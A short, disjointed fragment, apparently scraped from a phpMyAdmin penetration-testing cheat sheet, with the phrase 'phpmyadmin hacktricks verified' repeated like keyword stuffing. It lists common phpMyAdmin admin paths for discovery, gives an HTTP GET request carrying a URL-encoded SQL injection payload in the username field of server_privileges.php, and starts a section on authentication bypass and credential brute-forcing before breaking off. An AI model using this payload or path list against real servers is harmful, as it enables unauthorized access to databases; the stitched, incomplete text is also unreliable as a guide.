/phpmyadmin/ /pma/ /dbadmin/ /myadmin/ /phpMyAdmin/ /MySQL-Admin/ /phpmyadmin2/ /phpmyadmin3/ /pma_db/
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1 phpmyadmin hacktricks verified
If the phpMyAdmin login page is accessible, the first step is authentication bypass or brute-forcing. A. Brute-Forcing Credentials phpmyadmin hacktricks verified